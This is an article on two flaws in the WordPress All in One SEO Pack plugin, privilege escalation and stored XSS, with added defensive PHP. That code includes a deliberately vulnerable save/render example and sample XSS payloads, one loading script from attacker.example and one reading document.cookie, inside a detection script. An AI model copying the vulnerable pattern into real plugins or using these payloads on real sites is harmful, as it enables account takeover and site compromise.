In recent news, it was discovered that sites running the WordPress All in One SEO Pack plugin were at risk. Two serious vulnerabilities were found, and they may also have affected the search engine rankings of the sites that were hit. A fixed version has since been released, but a number of site owners are believed not to have installed it yet. At a time when we are constantly confronted with more complicated hacks and security flaws (the recent eBay password breach, for instance), it cannot be stressed enough how important it is to check your own SEO plugin and make sure it is fully up to date.
What Is the Plugin?
The first thing you must do is figure out whether or not you are actually using the All in One SEO Pack plugin.
The “All in One SEO Pack” plug-in automatically optimizes WordPress content for more efficient indexing by search engine crawlers to achieve a better ranking in search results.
The WordPress.org plugin directory lists it as one of the more popular plugins, with at least 18.5 million downloads. This means that if you run a WordPress site and are engaged in SEO efforts, there is a good chance you have it installed.
Two Security Issues
Two separate security issues were uncovered. Each is significant on its own, but combined they pose a real threat to the website itself, and they can also greatly affect your page rankings and domain authority, generally not for the better. The first flaw concerns access to the plugin's settings from the dashboard.
In the first case, a logged-in user without any administrative privileges (an author or a subscriber, for example) could add or modify certain parameters used by the plugin.
Among the things such a user could change are the keyword meta tags, the SEO description and the SEO title of a post. Used maliciously, which is generally the case, this could make the page ranking of the affected site drop dramatically. Unfortunately, attackers scan the internet daily for exactly these kinds of flaws, and some sites did suffer in their rankings as a result. Even when the access was used accidentally, damage could be done, because the user may not realize they were changing anything.
Some would say this issue is annoying but not dangerous: the page loses a little authority, and that can be restored as soon as the change is noticed. The second flaw makes the problem far more serious. It is a stored cross-site scripting bug: the values written through the first flaw are shown in the admin area without being escaped, so JavaScript placed in them runs in the browser of an administrator who views the affected page.
This means an attacker could inject JavaScript that performs actions as the administrator, such as changing the admin account's password or leaving a backdoor in the site's files in order to conduct further "evil" activities later.
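To make the two flaws concrete, here is an added illustration of the pattern that produces them in a WordPress plugin. It is not the All in One SEO Pack's own code and not the exact bug Sucuri reported: a `save_post` handler that stores an SEO title from the request without checking the user's capability or a nonce, and a meta box that prints the stored value without escaping. The hardened pair beside it shows the checks that close both holes. The meta key, field name, nonce action and function names are invented for the example, and the code assumes it is loaded inside WordPress as a (mu-)plugin.

```php
<?php
/*
 * Added example, not code from the All in One SEO Pack plugin. Assumes it is
 * loaded inside WordPress as a (mu-)plugin; meta key, field and nonce names
 * are invented for the illustration.
 */

// ---- Vulnerable pattern -------------------------------------------------
// Flaw 1 (privilege escalation): any logged-in user whose request reaches
// save_post can rewrite the SEO title of any post, because nothing checks
// who they are or whether they may edit that post.
// Flaw 2 (stored XSS), first half: the value is stored verbatim, so
// "<script>...</script>" is kept as-is.
function demo_seo_save_vulnerable( $post_id ) {
    if ( isset( $_POST['demo_seo_title'] ) ) {
        update_post_meta( $post_id, '_demo_seo_title', $_POST['demo_seo_title'] );
    }
}

// Flaw 2, second half: the stored value is echoed raw into the edit screen,
// so the script runs in the browser of whichever administrator opens it.
function demo_seo_render_vulnerable( $post ) {
    $title = get_post_meta( $post->ID, '_demo_seo_title', true );
    echo '<input type="text" name="demo_seo_title" value="' . $title . '">';
}

// ---- Hardened pattern ---------------------------------------------------
function demo_seo_save_hardened( $post_id ) {
    // Autosaves never carry our field; ignore them.
    if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
        return;
    }
    // Only a user allowed to edit this particular post may change its SEO
    // data. A subscriber fails here; an author passes only for their own posts.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    // The request must carry a valid nonce for this action (blocks CSRF).
    if ( ! isset( $_POST['demo_seo_nonce'] )
        || ! wp_verify_nonce( $_POST['demo_seo_nonce'], 'demo_seo_save_' . $post_id ) ) {
        return;
    }
    if ( isset( $_POST['demo_seo_title'] ) ) {
        // Strip tags and control characters before the value is stored.
        $title = sanitize_text_field( wp_unslash( $_POST['demo_seo_title'] ) );
        update_post_meta( $post_id, '_demo_seo_title', $title );
    }
}

function demo_seo_render_hardened( $post ) {
    $title = get_post_meta( $post->ID, '_demo_seo_title', true );
    // Emit the nonce the save handler checks for.
    wp_nonce_field( 'demo_seo_save_' . $post->ID, 'demo_seo_nonce' );
    // Escape on output as well: rows stored before the fix may still hold markup.
    echo '<input type="text" name="demo_seo_title" value="' . esc_attr( $title ) . '">';
}

// Wire up only the hardened pair; the vulnerable functions are for comparison.
add_action( 'save_post', 'demo_seo_save_hardened' );
add_action( 'add_meta_boxes', function () {
    add_meta_box( 'demo_seo', 'Demo SEO title', 'demo_seo_render_hardened', 'post' );
} );
```

The two halves matter together: the capability and nonce checks stop a subscriber from writing the field at all, and escaping on output (`esc_attr`) means that a value which somehow got stored with markup in it, for example before the fix was installed, is displayed as text rather than executed.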
The consequences for a site owner are far more serious. They may be locked out of their own accounts and powerless against changes made to their site. Their page and domain authority could be lost, and all the SEO work they have done would have been for nothing.
WordPress Community Response
The plugin's developers immediately got to work on a fix. After all, the plugin was designed to help people succeed in their SEO efforts, and the security flaws meant it was doing the opposite. They paid particular attention to the privilege escalation bug, the first issue described above, since it is what puts the vulnerable fields within reach of any logged-in user. A fixed release, version 2.1.6, came out within days of the flaws being reported.
Semper Fi was quick to patch the issues. It pushed out a fixed version, 2.1.6, that addresses the Sucuri issues along with a handful of other bug fixes reported by users in the company's support forums.
If you are using this plugin, all you need to do is log in to your dashboard, go to the plugin in the Plugins screen and click "update"; afterwards the installed version shown there should be 2.1.6 or later. Updating removes the flaw but not anything an attacker may already have stored or created, so also review the SEO fields of recently changed posts, the site's user list and the admin passwords. If the damage has already been done and you no longer have access to your own site, contact your web developer straight away to regain access.
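The two checks above can also be run from a shell on the server. The following stand-alone PHP script is an added example, not code from the plugin or from WordPress.org: it reads the `Version:` header of the plugin's main file and reports whether it is below 2.1.6, and it scans a set of SEO meta values for the usual markers of injected script so that posts edited through the first flaw can be found and cleaned. The plugin path, the meta key names mentioned in the comments, and the sample header and rows it falls back to when run outside a WordPress install are assumptions.

```php
<?php
/*
 * Added example, not code from the plugin or from WordPress. Run as
 * `php check_aioseop.php` from the WordPress root. The plugin path and the
 * constructed samples below are assumptions; replace them with your own.
 */

const FIXED_VERSION = '2.1.6';   // first release with the fix
// Assumed location of the plugin's main file.
const PLUGIN_MAIN = 'wp-content/plugins/all-in-one-seo-pack/all_in_one_seo_pack.php';

// Pull "Version: x.y.z" out of a WordPress plugin header comment.
function plugin_version_from_header( string $source ): ?string {
    if ( preg_match( '/^[ \t\/*#@]*Version:[ \t]*(\S+)/mi', $source, $m ) ) {
        return $m[1];
    }
    return null;
}

// True when the installed version predates the fix.
function is_vulnerable_version( string $installed ): bool {
    return version_compare( $installed, FIXED_VERSION, '<' );
}

// Return the post IDs whose meta value carries a marker of injected script.
// Expects rows shaped like SELECT post_id, meta_value FROM wp_postmeta.
function find_suspicious_meta( array $rows ): array {
    // Script/iframe tags, javascript: URLs and on* event handlers. Expect
    // the odd false positive (e.g. "one=" in ordinary text); review by hand.
    $pattern = '/<\s*(script|iframe|svg|img)\b|javascript\s*:|\bon[a-z]+\s*=/i';
    $hits = [];
    foreach ( $rows as $row ) {
        if ( preg_match( $pattern, (string) $row['meta_value'] ) ) {
            $hits[] = (int) $row['post_id'];
        }
    }
    return array_values( array_unique( $hits ) );
}

// --- 1. Version check ----------------------------------------------------
// Constructed sample header, used only when the real file is not present.
$sample_header = "<?php\n/*\nPlugin Name: All in One SEO Pack\nVersion: 2.1.5\n*/\n";
$source  = is_readable( PLUGIN_MAIN ) ? file_get_contents( PLUGIN_MAIN ) : $sample_header;
$version = plugin_version_from_header( $source );
if ( $version === null ) {
    echo "Plugin version: unknown (header not found)\n";
} else {
    printf( "Plugin version: %s -> %s\n", $version,
        is_vulnerable_version( $version ) ? 'VULNERABLE, update to ' . FIXED_VERSION : 'ok' );
}

// --- 2. Scan stored SEO fields ------------------------------------------
// Constructed sample rows. In a real run, feed it the result of
//   SELECT post_id, meta_value FROM wp_postmeta
//   WHERE meta_key IN ('_aioseop_title', '_aioseop_description')
// (the plugin's SEO meta keys; the key names are assumed here).
$rows = [
    [ 'post_id' => 12, 'meta_value' => 'Ten tips for better coffee' ],
    [ 'post_id' => 15, 'meta_value' => 'Contact us<script src="//attacker.example/x.js"></script>' ],
    [ 'post_id' => 19, 'meta_value' => '<img src=x onerror="alert(document.cookie)">' ],
    [ 'post_id' => 23, 'meta_value' => 'Opening hours and directions' ],
];
$suspicious = find_suspicious_meta( $rows );
echo $suspicious
    ? "Review and clean SEO fields on posts: " . implode( ', ', $suspicious ) . "\n"
    : "No suspicious SEO meta values found\n";
```

With the constructed samples the script reports version 2.1.5 as vulnerable and flags posts 15 and 19. Cleaning a flagged field through the dashboard is only safe once the plugin has been updated; on an unpatched version the stored script would run in your browser as soon as you open the post's edit screen.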
WordPress is one of the most popular CMS platforms in the world. Because of this, it is under almost constant attack from criminals, and under constant scrutiny from researchers who report the flaws they find. Luckily, it has an excellent team that is genuinely thankful whenever a flaw is uncovered, since each report is an opportunity to fix and improve the software.
Many people use WordPress because of how well it is developed and how easily it provides SEO options that would normally take a great deal of time and money. They choose plugins rather than paying an SEO professional to optimize their website. After the latest security flaws in some plugins, more people are expected to turn back to professional SEO services, which gives them more confidence that their page and domain authority will remain strong.
Recent research has shown that some plugins in the WordPress community are unsafe, and these plugins are typically downloaded many thousands of times. WordPress has also had multiple high-profile attacks to deal with lately. Rest assured, though: WordPress has a large community of developers qualified to tackle these security issues. No software on the market is free of people looking to exploit it. WordPress and its community have been doing a great job for many years of addressing issues as they arise, and they continually improve both the core software and the plugins they create. WordPress is, and for the foreseeable future will remain, an excellent CMS for building and maintaining websites.